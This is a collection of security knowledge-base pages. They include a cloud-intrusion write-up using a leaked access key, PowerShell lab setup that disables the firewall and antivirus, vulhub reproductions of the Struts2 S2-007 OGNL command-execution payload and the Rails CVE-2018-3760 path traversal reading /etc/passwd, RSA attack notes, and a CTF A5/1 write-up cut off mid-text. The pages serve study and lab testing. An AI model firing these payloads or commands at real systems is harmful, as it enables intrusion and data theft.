--- title: 记录一次平平无奇的云上攻防过程 --- <center><h1>记录一次平平无奇的云上攻防过程</h1></center> --- ::: warning 注意 该文章适用于 CF v0.4.0 版本,该文中的命令在新版本中可能会有些变动,请以使用手册里的命令为准。 ::: ## 0x00 前言 之前有次在做攻防演练的时候,通过反编译小程序找到了目标云服务的 Access Key,最终通过这个 AK 拿下了目标上千万条敏感信息以及几十台云服务主机的 root 权限,整个过程平平无奇,这里简单记录下。 **阅前须知:** - 文中数据的值都是虚构的内容,非真实场景里的数据。 - 文中使用的 CF 工具版本为 v0.4.0,如果读者有在使用 CF,为避免版本不同导致命令不一致的情况,请以 CF 使用手册里的命令为准,CF 使用手册地址:[wiki.teamssix.com/cf](https://wiki.teamssix.com/cf) ## 0x01 发现访问凭证并利用 首先找到目标的微信小程序,反编译小程序找到了硬编码在源码里的 Access Key,将 Access Key 配置到 CF 云环境利用框架里,CF 项目地址:[github.com/teamssix/cf](https://github.com/teamssix/cf) ```bash cf config ``` <img width="800" src="/img/1663079548.png"> 尝试列出一下当前访问凭证的资源,因为输出内容较多,这里仅展示了一部分,再次提醒一下,本文图片中数据的值都是虚构内容,非真实场景里的数据。 ```bash cf alibaba ls ``` <img width="1000" src="/img/1663079661.png"> 最终通过 CF 列出这个 AK 里有 2 个存储桶以及 30 多台云服务主机,不过里面有一台是关机的。 ## 0x02 存储桶的利用 先来看这两个存储桶,在第一个存储桶 teamssix-api-example 里有 500 多 M 的数据,在存储桶体积比较少的情况下,可以直接使用 `cf alibaba oss obj get`命令下载存储桶里的所有对象,但这里存储桶体积比较大,还是用 OSS Browser 大概预览下吧。 用 OSS Browser 打开第一个存储桶,翻了一遍,没有发现太多敏感的信息,然后继续打开第二个存储桶,发现在第二个存储桶里存储了大量的身份证信息。 <img width="800" src="/img/1663081994.png"> 在 OSS Browser 里没办法看到这些文件的总数,好在 CF 的输出结果里可以看到存储桶的文件总数。 从 CF 的输出结果来看这个存储桶总共有 345 w 条数据,从 OSS Browser 列出的结果来看,估计这三百多万条的数据应该都是身份证照片之类的信息了。 ## 0x03 ECS 的利用 刚才通过 CF 发现了 30 多台云服务主机,这里先看看 CF 能对云主机执行哪些操作。 ```bash cf alibaba ecs exec -h ``` <img width="800" src="/img/1663083448.png"> 在写报告的时候需要有服务器权限证明的截图,这里可以直接使用 CF 一键执行三要素,方便写报告。 ```bash cf alibaba ecs exec -b ``` <img width="800" src="/img/1663083450.png"> <img width="800" src="/img/1663083688.png"> 接下来打算翻翻实例,看看能不能发现什么有用的信息,后来在一个实例的命令历史记录里发现了 MySQL 数据库的明文密码。 ```bash cf alibaba ecs exec -i i-abcdefghijklmn33 -c "cat ~/.bash_history | grep mysql" ``` <img width="900" src="/img/1663084848.png"> 连接到数据库后,开始翻数据库,翻着翻着,在一张表里发现好东西,这张表存储了目标一千多万条敏感数据。 再后来,在其他的实例中还发现了一些容器,包括 ES 、Redis 数据库的容器,不过里面数据量没有太多。 ## 0x04 总结建议 到这里,通过这个 AK 已经拿到了目标一千多万条数据库敏感信息、三百多万条身份证照片信息以及三十多台服务器 root 权限。 报告交上去后,给的分数也很可观,不过这里因为不通靶标,所以只能搞点数据分和权限分了。 总的来说,整个过程没有太大的波澜,这里主要是利用了两处目标的风险点: 1. 云服务的 Access Key 直接硬编码到了小程序里 1. Access Key 权限没有做好控制 解决起来也很简单: 1. 小程序里不要硬编码 Access Key,建议可以用临时密钥啥的 1. 这里的 Access Key 应该是只需要 OSS 的权限,ECS 的权限就不应该再赋予给这个 AK 了 最后,如果师傅感觉 CF 这个工具还不错,记得给个 Star 呀 ~ ,CF 项目地址:[github.com/teamssix/cf](https://github.com/teamssix/cf) <Vssue /> <script> export default { mounted () { this.$page.lastUpdated = "2022年9月14日" } } </script>
sec-knowleage
# uncover --- ## 免责声明 `本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.` --- **项目地址** - [projectdiscovery/uncover](https://github.com/projectdiscovery/uncover) --- ## 安装 **通过 go 安装** ```bash go install -v github.com/projectdiscovery/uncover/cmd/uncover@latest ``` **通过 f8x 安装** ```bash curl -o f8x https://f8x.io/ && mv --force f8x /usr/local/bin/f8x && chmod +x /usr/local/bin/f8x f8x -k ``` --- ## 配置 第一次运行,会在 `$HOME/.config/uncover/provider-config.yaml` 创建个空文件 需要自行修改 api 密钥 ```yaml shodan: [xxxxxxxxxxxxxxxxxxxx] censys: [xxxxxxxxxxxxxxxxxxxx:xxxxxxxxxxxxxxxxxxxx] fofa: [xxxxxxxxxx@qq.com:xxxxxxxxxxxxxxxxxxxx] quake: [xxxxxxxxxxxxxxxxxxxx] hunter: [xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx] zoomeye: [xxxxxxxxxxxxxxxxxxxx@qq.com:xxxxxxxxxxxxxxxxxxxx] ``` --- ## 使用 **同时对多个搜索引擎进行查询** 搜索 `jira` ``` echo jira | uncover -e shodan,censys,fofa,quake,hunter,zoomeye ``` **对多个搜索引擎进行多个查询** ``` uncover -shodan 'http.component:"Atlassian Jira"' -censys 'services.software.product=`Jira`' -fofa 'app="ATLASSIAN-JIRA"' -quake 'Jira' -hunter 'Jira' -zoomeye 'app:"Atlassian JIRA"' ``` **对多个搜索语句进行查询** ``` cat dorks.txt ssl:"Uber Technologies, Inc." title:"Grafana" ``` ``` uncover -q dorks.txt ```
sec-knowleage
# 伪随机数生成器介绍 ## 概述 伪随机数生成器(pseudorandom number generator,PRNG),又称为确定性随机位生成器(deterministic random bit generator,DRBG),是用来生成**接近于绝对随机数序列的数字序列**的算法。一般来说,PRNG 会依赖于一个初始值,也称为种子,来生成对应的伪随机数序列。只要种子确定了,PRNG 所生成的随机数就是完全确定的,因此其生成的随机数序列并不是真正随机的。 就目前而言,PRNG 在众多应用都发挥着重要的作用,比如模拟(蒙特卡洛方法),电子竞技,密码应用。 ## 随机性的严格性 - 随机性:随机数应该不存在统计学偏差,是完全杂乱的数列。 - 不可预测性:不能从过去的序列推测出下一个出现的数。 - 不可重现性:除非数列保存下来,否则不能重现相同的数列。 这三个性质的严格性依次递增。 一般来说,随机数可以分为三类 | 类别 | 随机性 | 不可预测性 | 不可重现性 | | :--------: | :----: | :--------: | :--------: | | 弱伪随机数 | ✅ | ❌ | ❌ | | 强伪随机数 | ✅ | ✅ | ❌ | | 真随机数 | ✅ | ✅ | ✅ | 一般来说,密码学中使用的随机数是第二种。 ## 周期 正如我们之前所说,一旦 PRNG 所依赖的种子确定了,那么 PRNG 生成的随机数序列基本也就确定了。这里定义 PRNG 的周期如下:对于一个 PRNG 的**所有可能起始状态**,不重复序列的最长长度。显然,对于一个 PRNG 来说,其周期不会大于其所有可能的状态。但是,需要注意的是,并不是当我们遇到重复的输出时,就可以认为是 PRNG 的周期,因为 PRNG 的状态一般都是大于输出的位数的。 ## 评价标准 参见维基百科,https://en.wikipedia.org/wiki/Pseudorandom_number_generator。 ## 分类 目前通用的伪随机数生成器主要有 - 线性同余生成器,LCG - 线性回归发生器 - [Mersenne Twister](https://en.wikipedia.org/wiki/Mersenne_Twister) - [xorshift](https://en.wikipedia.org/wiki/Xorshift) generators - [WELL](https://en.wikipedia.org/wiki/Well_Equidistributed_Long-period_Linear) family of generators - Linear feedback shift register,LFSR,线性反馈移位寄存器 ## 问题 通常来说,伪随机数生成器可能会有以下问题 - 在某些种子的情况下,其生成的随机数序列的周期会比较小。 - 生成大数时,分配的不均匀。 - 连续值之间关联密切,知道后续值,可以知道之前的值。 - 输出序列的值的大小很不均匀。 ## 参考 https://en.wikipedia.org/wiki/Pseudorandom_number_generator
sec-knowleage
# PowerShell 搭建AD域渗透环境 > 同一台虚拟机需要重置SID > > ``` > %WINDIR%\system32\sysprep\sysprep.exe /generalize /restart /oobe > ``` ## 森林 ```powershell #更改主机名 #Rename-Computer -NewName "dc" #设置静态地址 New-NetIPAddress –IPAddress 10.10.10.10 -DefaultGateway 10.10.10.1 -PrefixLength 24 -InterfaceIndex (Get-NetAdapter).InterfaceIndex #设置DNS Set-DNSClientServerAddress -InterfaceIndex(Get-NetAdapter).InterfaceIndex -ServerAddresses 10.10.10.10 #密码永不过期 Set-LocalUser -Name "administrator" -PasswordNeverExpires 1 #关闭密码复杂度 secedit /export /cfg c:\secpol.cfg (gc C:\secpol.cfg).replace("PasswordComplexity = 1", "PasswordComplexity = 0") | Out-File C:\secpol.cfg secedit /configure /db c:\windows\security\local.sdb /cfg c:\secpol.cfg /areas SECURITYPOLICY rm -force c:\secpol.cfg -confirm:$false #设置密码最长时间 net accounts /MAXPWAGE:999 # Install-WindowsFeature RSAT-AD-PowerShell Get-WindowsFeature -Name RSAT-AD-PowerShell #获取域安装信息 Get-WindowsFeature "*ad*" #安装域控 Install-WindowsFeature ad-domain-services -IncludeAllSubFeature -IncludeManagementTools Get-WindowsFeature "*ad*" $SecurePwd = ConvertTo-SecureString "abcABC123" -AsPlainText -Force #建立域 Install-ADDSForest -DomainName "sectest.com" -InstallDNS -SafeModeAdministratorPassword $SecurePwd -NoRebootOnCompletion -Force #关闭休眠 powercfg.exe -x -monitor-timeout-ac 0 powercfg.exe -x -monitor-timeout-dc 0 powercfg.exe -x -disk-timeout-ac 0 powercfg.exe -x -disk-timeout-dc 0 powercfg.exe -x -standby-timeout-ac 0 powercfg.exe -x -standby-timeout-dc 0 powercfg.exe -x -hibernate-timeout-ac 0 powercfg.exe -x -hibernate-timeout-dc 0 #关闭防火墙 Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False Get-NetFirewallProfile #关闭Windows AV Set-MpPreference -DisableRealtimeMonitoring $true Set-MpPreference -DisableArchiveScanning $True Set-MpPreference -DisableRemovableDriveScanning $True Set-MpPreference -SubmitSamplesConsent 2 Set-MpPreference -MAPSReporting Disable #Uninstall-WindowsFeature -Name Windows-Defender #设置域用户密码永不过期 #Import-Module ActiveDirectory #Get-ADUser -Filter * | Set-ADUser -PasswordNeverExpires:$True #重启电脑 Restart-Computer ``` ## 子域 ```powershell #设置静态地址 New-NetIPAddress –IPAddress 10.10.10.20 -DefaultGateway 10.10.10.1 -PrefixLength 24 -InterfaceIndex (Get-NetAdapter).InterfaceIndex #设置DNS Set-DNSClientServerAddress -InterfaceIndex(Get-NetAdapter).InterfaceIndex -ServerAddresses 10.10.10.10 #密码永不过期 Set-LocalUser -Name "administrator" -PasswordNeverExpires 1 #关闭密码复杂度 secedit /export /cfg c:\secpol.cfg (gc C:\secpol.cfg).replace("PasswordComplexity = 1", "PasswordComplexity = 0") | Out-File C:\secpol.cfg secedit /configure /db c:\windows\security\local.sdb /cfg c:\secpol.cfg /areas SECURITYPOLICY rm -force c:\secpol.cfg -confirm:$false #设置密码最长时间 net accounts /MAXPWAGE:999 #关闭休眠 powercfg.exe -x -monitor-timeout-ac 0 powercfg.exe -x -monitor-timeout-dc 0 powercfg.exe -x -disk-timeout-ac 0 powercfg.exe -x -disk-timeout-dc 0 powercfg.exe -x -standby-timeout-ac 0 powercfg.exe -x -standby-timeout-dc 0 powercfg.exe -x -hibernate-timeout-ac 0 powercfg.exe -x -hibernate-timeout-dc 0 #关闭防火墙 Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False Get-NetFirewallProfile #关闭Windows AV Set-MpPreference -DisableRealtimeMonitoring $true Set-MpPreference -DisableArchiveScanning $True Set-MpPreference -DisableRemovableDriveScanning $True Set-MpPreference -SubmitSamplesConsent 2 Set-MpPreference -MAPSReporting Disable # Install-WindowsFeature RSAT-AD-PowerShell Get-WindowsFeature -Name RSAT-AD-PowerShell #获取域安装信息 Get-WindowsFeature "*ad*" #安装域控 Install-WindowsFeature ad-domain-services -IncludeAllSubFeature -IncludeManagementTools # $SecurePwd = ConvertTo-SecureString "abcABC123" -AsPlainText -Force $username = "sectest.com\administrator" $password = "abcABC123" | ConvertTo-SecureString -asPlainText -Force $Credential =New-Object System.Management.Automation.PSCredential($username, $password) Install-ADDSDomain -Credential $Credential -NewDomainName children -ParentDomainName "sectest.com" -domaintype childdomain -NewDomainNetBIOSName chilesec -InstallDNS -CreateDNSDelegation -NoRebootOnCompletion -SafeModeAdministratorPassword $SecurePwd #重启电脑 Restart-Computer ``` ## PC > ``` > set-executionpolicy remotesigned > ``` ```powershell #设置静态地址 New-NetIPAddress –IPAddress 10.10.10.40 -DefaultGateway 10.10.10.1 -PrefixLength 24 -InterfaceAlias Ethernet0 #设置DNS Set-DNSClientServerAddress -InterfaceIndex(Get-NetAdapter).InterfaceIndex -ServerAddresses 10.10.10.10 #密码永不过期 Set-LocalUser -Name "administrator" -PasswordNeverExpires 1 #关闭密码复杂度 secedit /export /cfg c:\secpol.cfg (gc C:\secpol.cfg).replace("PasswordComplexity = 1", "PasswordComplexity = 0") | Out-File C:\secpol.cfg secedit /configure /db c:\windows\security\local.sdb /cfg c:\secpol.cfg /areas SECURITYPOLICY rm -force c:\secpol.cfg -confirm:$false #设置密码最长时间 net accounts /MAXPWAGE:999 #关闭休眠 powercfg.exe -x -monitor-timeout-ac 0 powercfg.exe -x -monitor-timeout-dc 0 powercfg.exe -x -disk-timeout-ac 0 powercfg.exe -x -disk-timeout-dc 0 powercfg.exe -x -standby-timeout-ac 0 powercfg.exe -x -standby-timeout-dc 0 powercfg.exe -x -hibernate-timeout-ac 0 powercfg.exe -x -hibernate-timeout-dc 0 #关闭防火墙 Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False Get-NetFirewallProfile #关闭Windows AV Set-MpPreference -DisableRealtimeMonitoring $true Set-MpPreference -DisableArchiveScanning $True Set-MpPreference -DisableRemovableDriveScanning $True Set-MpPreference -SubmitSamplesConsent 2 Set-MpPreference -MAPSReporting Disable #加入域 $username = "sectest.com\administrator" $password = "abcABC123" | ConvertTo-SecureString -asPlainText -Force $Credential =New-Object System.Management.Automation.PSCredential($username, $password) Add-Computer -DomainName sectest.com -Credential $Credential #重启电脑 Restart-Computer ```
sec-knowleage
'\" t .TH "SYSTEMD\-TTY\-ASK\-PASSWORD\-AGENT" "1" "" "systemd 231" "systemd-tty-ask-password-agent" .\" ----------------------------------------------------------------- .\" * Define some portability stuff .\" ----------------------------------------------------------------- .\" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ .\" http://bugs.debian.org/507673 .\" http://lists.gnu.org/archive/html/groff/2009-02/msg00013.html .\" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ .ie \n(.g .ds Aq \(aq .el .ds Aq ' .\" ----------------------------------------------------------------- .\" * set default formatting .\" ----------------------------------------------------------------- .\" disable hyphenation .nh .\" disable justification (adjust text to left margin only) .ad l .\" ----------------------------------------------------------------- .\" * MAIN CONTENT STARTS HERE * .\" ----------------------------------------------------------------- .SH "NAME" systemd-tty-ask-password-agent \- 列出或处理当前正在等待中的系统密码请求 .SH "SYNOPSIS" .HP \w'\fBsystemd\-tty\-ask\-password\-agent\ \fR\fB[OPTIONS...]\fR\fB\ \fR\fB[VARIABLE=VALUE...]\fR\ 'u \fBsystemd\-tty\-ask\-password\-agent \fR\fB[OPTIONS...]\fR\fB \fR\fB[VARIABLE=VALUE...]\fR .SH "描述" .PP \fBsystemd\-tty\-ask\-password\-agent\fR 是一个处理系统密码请求的代理。 例如在启动时向用户索要硬盘加密密码, 或者在运行时向用户索要SSL证书口令。 .PP \fBsystemd\-tty\-ask\-password\-agent\fR 的实现 遵守 \m[blue]\fBPassword Agents Specification\fR\m[]\&\s-2\u[1]\d\s+2 规范。 .SH "选项" .PP 能够识别的命令行选项如下: .PP \fB\-\-list\fR .RS 4 列出所有当前正在等待中的系统密码请求。 .RE .PP \fB\-\-query\fR .RS 4 在调用该命令的TTY上向用户索要密码, 以处理所有当前正在等待中的系统密码请求。 .RE .PP \fB\-\-watch\fR .RS 4 不间断的处理密码请求。 .RE .PP \fB\-\-wall\fR .RS 4 将密码请求转发给 \fBwall\fR(1) 而不是在调用该命令的TTY上向用户索要密码。 .RE .PP \fB\-\-plymouth\fR .RS 4 通过 \fBplymouth\fR(8) 向用户索要密码,而不是在调用该命令的TTY上向用户索要密码。 .RE .PP \fB\-\-console\fR .RS 4 通过 /dev/console 向用户索要密码, 而不是在调用该命令的TTY上向用户索要密码。 .RE .PP \fB\-h\fR, \fB\-\-help\fR .RS 4 显示简短的帮助信息并退出。 .RE .PP \fB\-\-version\fR .RS 4 显示简短的版本信息并退出。 .RE .SH "退出状态" .PP 返回值为 0 表示成功, 非零返回值表示失败代码。 .SH "参见" .PP \fBsystemd\fR(1), \fBsystemctl\fR(1), \fBsystemd-ask-password-console.service\fR(8), \fBwall\fR(1), \fBplymouth\fR(8) .SH "NOTES" .IP " 1." 4 Password Agents Specification .RS 4 \%http://www.freedesktop.org/wiki/Software/systemd/PasswordAgents .RE .\" manpages-zh translator: 金步国 .\" manpages-zh comment: 金步国作品集:http://www.jinbuguo.com
sec-knowleage
version: '3' x-airflow-common: &airflow-common image: vulhub/airflow:1.10.10 environment: &airflow-common-env AIRFLOW__CORE__EXECUTOR: CeleryExecutor AIRFLOW__CORE__SQL_ALCHEMY_CONN: postgresql+psycopg2://airflow:airflow@postgres/airflow AIRFLOW__CELERY__RESULT_BACKEND: db+postgresql://airflow:airflow@postgres/airflow AIRFLOW__CELERY__BROKER_URL: redis://:@redis:6379/0 AIRFLOW__CORE__FERNET_KEY: '' AIRFLOW__CORE__DAGS_ARE_PAUSED_AT_CREATION: 'true' AIRFLOW__CORE__LOAD_EXAMPLES: 'true' #AIRFLOW__API__AUTH_BACKEND: 'airflow.api.auth.backend.basic_auth' AIRFLOW__API__AUTH_BACKEND: 'airflow.api.auth.backend.default' user: "${AIRFLOW_UID:-50000}:${AIRFLOW_GID:-50000}" depends_on: redis: condition: service_healthy postgres: condition: service_healthy services: postgres: image: postgres:13-alpine environment: POSTGRES_USER: airflow POSTGRES_PASSWORD: airflow POSTGRES_DB: airflow healthcheck: test: ["CMD", "pg_isready", "-U", "airflow"] interval: 5s retries: 5 redis: image: redis:5-alpine ports: - 6379:6379 healthcheck: test: ["CMD", "redis-cli", "ping"] interval: 5s timeout: 30s retries: 50 airflow-webserver: <<: *airflow-common command: webserver ports: - 8080:8080 healthcheck: test: ["CMD", "curl", "--fail", "http://localhost:8080/health"] interval: 10s timeout: 10s retries: 5 airflow-scheduler: <<: *airflow-common command: scheduler healthcheck: test: ["CMD-SHELL", 'airflow jobs check --job-type SchedulerJob --hostname "$${HOSTNAME}"'] interval: 10s timeout: 10s retries: 5 airflow-worker: <<: *airflow-common command: worker healthcheck: test: - "CMD-SHELL" - 'celery --app airflow.executors.celery_executor.app inspect ping -d "celery@$${HOSTNAME}"' interval: 10s timeout: 10s retries: 5 airflow-init: <<: *airflow-common command: initdb environment: <<: *airflow-common-env _AIRFLOW_DB_UPGRADE: 'true' flower: <<: *airflow-common command: flower ports: - 5555:5555 healthcheck: test: ["CMD", "curl", "--fail", "http://localhost:5555/"] interval: 10s timeout: 10s retries: 5
sec-knowleage
### d 泄露攻击原理 首先当 $d$ 泄露之后,我们自然可以解密所有加密的消息。我们甚至还可以对模数 N 进行分解。其基本原理如下 我们知道 $ed \equiv 1 \bmod \varphi(n)$,那么存在一个 $k$ 使得 $$ ed-1=k\varphi(n) $$ 又 $\forall a\in {Z}_n^*$,满足$a^{ed-1}\equiv1(\bmod n)$。令 $$ ed-1=2^st $$ 其中,$t$ 是一个奇数。然后可以证明对于至少一半的 $a\in {Z}_n^*$,存在一个 $i\in[1,s]$,使得 $$ a^{2^{i-1}t}\not\equiv\pm1(\bmod n),a^{2^{i}t}\equiv1(\bmod n) $$ 成立。如果 $a,i$ 满足上述条件,$gcd(a^{2^{i-1}t}-1,n)$是 $n$ 的一个非平凡因子,所以可以对 $n$ 进行暴力分解。 ### d 泄露攻击工具 利用以下工具可以直接进行计算 - RsaConverter.exe (https://sourceforge.net/projects/rsaconverter/ , for windows ) - [rsatool.py](https://github.com/ius/rsatool/blob/master/rsatool.py)(分解原理如上) ### Wiener's Attack攻击条件 在 d 比较小($d<\frac{1}{3}N^{\frac{1}{4}}$)时,攻击者可以使用 **Wiener's Attack** 来获得私钥。 ### Wiener's Attack攻击原理 - https://en.wikipedia.org/wiki/Wiener%27s_attack - https://sagi.io/2016/04/crypto-classics-wieners-rsa-attack/ ### Wiener's Attack攻击工具 - https://github.com/pablocelayes/rsa-wiener-attack - https://github.com/orisano/owiener
sec-knowleage
# S2-007 远程代码执行漏洞 影响版本: 2.0.0 - 2.2.3 漏洞详情: http://struts.apache.org/docs/s2-007.html ## 测试环境搭建 ``` docker compose build docker compose up -d ``` ## 原理 参考 http://rickgray.me/2016/05/06/review-struts2-remote-command-execution-vulnerabilities.html 当配置了验证规则 `<ActionName>-validation.xml` 时,若类型验证转换出错,后端默认会将用户提交的表单值通过字符串拼接,然后执行一次 OGNL 表达式解析并返回。例如这里有一个 UserAction: ```java (...) public class UserAction extends ActionSupport { private Integer age; private String name; private String email; (...) ``` 然后配置有 UserAction-validation.xml: ```xml <?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE validators PUBLIC "-//OpenSymphony Group//XWork Validator 1.0//EN" "http://www.opensymphony.com/xwork/xwork-validator-1.0.2.dtd"> <validators> <field name="age"> <field-validator type="int"> <param name="min">1</param> <param name="max">150</param> </field-validator> </field> </validators> ``` 当用户提交 age 为字符串而非整形数值时,后端用代码拼接 `"'" + value + "'"` 然后对其进行 OGNL 表达式解析。要成功利用,只需要找到一个配置了类似验证规则的表单字段使之转换出错,借助类似 SQLi 注入单引号拼接的方式即可注入任意 OGNL 表达式。 因为受影响版本为 Struts2 2.0.0 - Struts2 2.2.3,所以这里给出绕过安全配置进行命令执行的 Payload(**弹计算器,无法在本项目环境下运行**): ``` ' + (#_memberAccess["allowStaticMethodAccess"]=true,#foo=new java.lang.Boolean("false") ,#context["xwork.MethodAccessor.denyMethodExecution"]=#foo,@java.lang.Runtime@getRuntime().exec("open /Applications/Calculator.app")) + ' ``` ## Exploit @rickgray 在原文中只给了弹计算器的POC,我给出执行任意代码的EXP: ``` ' + (#_memberAccess["allowStaticMethodAccess"]=true,#foo=new java.lang.Boolean("false") ,#context["xwork.MethodAccessor.denyMethodExecution"]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())) + ' ``` 将Exp传入可以利用的输入框(age),得到命令执行结果: ![](1.jpeg)
sec-knowleage
##Trivia 3 (Trivia, 300p) We got this log which is highly compressed. Find the intruder's secret. ###PL [ENG](#eng-version) ###ENG version
sec-knowleage
# Ruby On Rails 路径穿越漏洞(CVE-2018-3760) Ruby On Rails在开发环境下使用Sprockets作为静态文件服务器,Ruby On Rails是著名Ruby Web开发框架,Sprockets是编译及分发静态资源文件的Ruby库。 Sprockets 3.7.1及之前版本中,存在一处因为二次解码导致的路径穿越漏洞,攻击者可以利用`%252e%252e/`来跨越到根目录,读取或执行目标服务器上任意文件。 参考链接: - https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf - https://seclists.org/oss-sec/2018/q2/210 - https://xz.aliyun.com/t/2542 ## 环境搭建 启动一个用Ruby On Rails脚手架生成的默认站点: ``` docker compose up -d ``` 访问`http://your-ip:3000`即可查看到欢迎页面。 ## 漏洞复现 直接访问`http://your-ip:3000/assets/file:%2f%2f/etc/passwd`,将会报错,因为文件`/etc/passwd`不在允许的目录中: ![](1.png) 我们通过报错页面,可以获得允许的目录列表。随便选择其中一个目录,如`/usr/src/blog/app/assets/images`,然后使用`%252e%252e/`向上一层跳转,最后读取`/etc/passwd`: ``` http://your-ip:3000/assets/file:%2f%2f/usr/src/blog/app/assets/images/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd ``` ![](2.png)
sec-knowleage
# Crypto A5/1 (crypto, 380p, 12 solved) ``` ./chatclient 43.224.35.245 3425 one of secret key: id: manh key: 0x7f6949db22eeada0 Can you get the secret? ``` In the task we get [lots of sources](crypto01.zip) of the server and client applications. In short, the server is running a chatbot, which responds with a set of predefined responses, based on how close our input to predefined questions. The communication is encrypted via A5/1, where the symmetrical shared key is derived from secret key and timestamp. ## Overview The most important part is the chatbot loop: ```c A51Comm a51Comm(secretKey, COMM_TIMEOUT, fd, fd); if (DEBUG) {std::cout << "Enter encrypted mode\n";} while(1) { if (!a51Comm.receive(sInput)) { // some error occured std::cerr << "Some error occured at receive\n"; return 1; } l.log("Got: "); l.log(sInput); if (DEBUG) {std::cout << "Got: " << sInput << "\n";} if (sInput == "quit") { l.log("quit"); if (DEBUG) {std::cout << "quit\n";} break; } else if (sInput == "super") { superMode = true; if (!a51Comm.send(std::string("Enter supper mode!"))) { // some error occured std::cerr << "Some error occured at send\n"; return (1); } l.log("Enter super mode"); getSuperSecretKey(superSecretKey, argv[3]); a51Comm = A51Comm(superSecretKey, COMM_TIMEOUT, fd, fd); } else if (sInput == "secret") { if (!superMode) { if (!a51Comm.send(std::string("You have not entered super mode!"))) { // some error occured std::cerr << "Some error occured at send\n"; return (1); } l.log("Have not entered super mode!"); } else { std::string data = "Secret: "; data += getSecretData(argv[4]); if (!a51Comm.send(data)) { // some error occured std::cerr << "Some error occured at send\n"; return (1); } l.log("Sent secret"); } } else { sResponse = getResponse(sInput, records); if (!a51Comm.send(sResponse)) { // some error occured std::cerr << "Some error occured at send\n"; return (1); } l.log(sResponse); } } ``` We can see here that the bot creates encrypted channel using the secret key we provide. Then it's waiting for commands. There are 2 interesting special command -> `secret` and `super`. First one sends us the flag, but it can only be invoked after `super`. The problem is that `super` triggers changing the encrypted channel to use a different secret key, which we don't know. We need to invoke `super` command, and then issue `secret` command to get back the flag. However `super` will change the secret key, and from this point the server won't be able to properly decrypt our messages, and we won't be able to decrypt messages from the server. ## A5/1 stream cipher Without going into much details, the encryption in the task is using a stream-cipher with keystream derived from secret key and timestamp. However, the timestamp is changed only every 30 seconds, and there is no notion of any counter (like in CTR mode), so for 30 seconds keystream stays constant! Timestamps are kept independent, and are sent with the encrypted message. This means the receiving side uses the timestamp we send to decrypt the data. ## Recovering keystream and forging messages Since the responses from the server are pre-defined, we can easily recover the keystream, by XORing the encrypted payload with the plaintext message. We can do this easily, because the message contains also the `length`, and most of the plaintexts have different length, only 24 is repeated. This means that even if the server changes the encryption secret key after we issue `super` command, we can recover the keystream! With keystream, we can encrypt any message we want (assuming it's not too long) by simply XORing the message with keystream we recovered. We know the timestamp server used, so we can send the same one, to make sure the server gets identical keystream and decrypts message correctly. Server will also keep his own timestamp valid for 30 seconds, so every message will be encrypted with the same keystream, and therefore we can easily decrypt them. ## Getting the flag The idea of the attack is pretty simple now: 1. Connect to the server. 2. Send `super` message. 3. Send some random message, just so we can get back response from server encrypted with secret key. Repeat this if we get message which is too short (like `Hey`) or is ambigious (like length 24). Save the timestamp used by server. 4. XOR the ciphertext with known plaintext message with the same length to recover keystream. 5. Encrypt `secret` using the keystream by XORing and send the encrypted `secret` with the same timestamp server was using. 6. Save the encrypted `flag` we get. 7. Encrypt `How are you?` using the keystream by XORing and send the encrypted value with the same timestamp server was using. Repeat this until we get back the answer with length 56. 8. XOR the last message ciphertext with `I'm a bot, I don't feel much of anything, how about you?` to recover 56 bytes of keystream. 9. XOR keystream with encrypted flag. We did this by modifying the client a bit, and writing the rest of the attack in python. We added a function to the crypto communication library, so we could send already encrypted payloads directly, using the same timestamp as server was using: ```c bool A51Comm::send_raw_hex(const std::string& data) { std::cout<<"========================== SEND RAW START =========================="<<"\n"; timestamp = partnerTimestamp; uint64_t dataLength = data.length()/2; std::cout << "timestamp: " << timestamp << "\n"; std::cout << "data-length: " << dataLength << '\n'; const char* payload = hex_to_string(data).c_str(); // send in form: p64(timestamp) + p64(data-length) + encrypted write(fdOut, &timestamp, 8); write(fdOut, &dataLength, 8); write(fdOut, payload, dataLength); std::cout<<"========================== SEND RAW END =========================="<<"\n"; return true; } ``` We modified the client a bit as well: ```c A51Comm a51Comm(key, COMM_TIMEOUT, sockfd, sockfd); a51Comm.send(std::string("Hi")); a51Comm.receive(input); puts(input.c_str()); a51Comm.send(std::string("super")); a51Comm.receive(input); puts(input.c_str()); a51Comm.send(std::string("aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa")); a51Comm.receive(input); puts(input.c_str()); while(true) { fgets(buffer, BUFF_LEN, stdin); buffer[strcspn(buffer, "\n")] = 0; if (!a51Comm.send_raw_hex(std::string(buffer))) { // some error occured fprintf(stderr, "Some error occured at send\n"); exit(1); } if (!a51Comm.receive(input)) { // some error occured fprintf(stderr, "Some error occured at receive\n"); exit(1); } puts(input.c_str()); } ``` We automatically send greeting, then enter super mode, and then send lots of `aa` hoping to get a reasonably long response. After that we start sending raw hex payloads to the server. We also added logging of the raw hex payloads in the client. The other part of the attack is: ```python import codecs from crypto_commons.generic import xor_string def main(): responses = {} with codecs.open("records.txt") as input_file: for line in input_file: if "<response>" in line: response = line[line.index("<response>") + 11:-1] responses[len(response)] = response length = raw_input("len: ") payload = raw_input("raw payload: ").decode("hex") s = responses[int(length)] xor_key = xor_string(s, payload) print('secret', xor_string("secret", xor_key).encode("hex").upper()) print('How are you?', xor_string("How are you?", xor_key).encode("hex").upper()) flag_ct = raw_input("flag payload") how_ct = raw_input("'How are you?' payload") xor_key = xor_string(how_ct.decode("hex"), responses[56]) print(xor_string(flag_ct.decode("hex"), xor_key)) main() ``` This code asks for length and raw hex payload of the server message encrypted after entering super mode. We copy 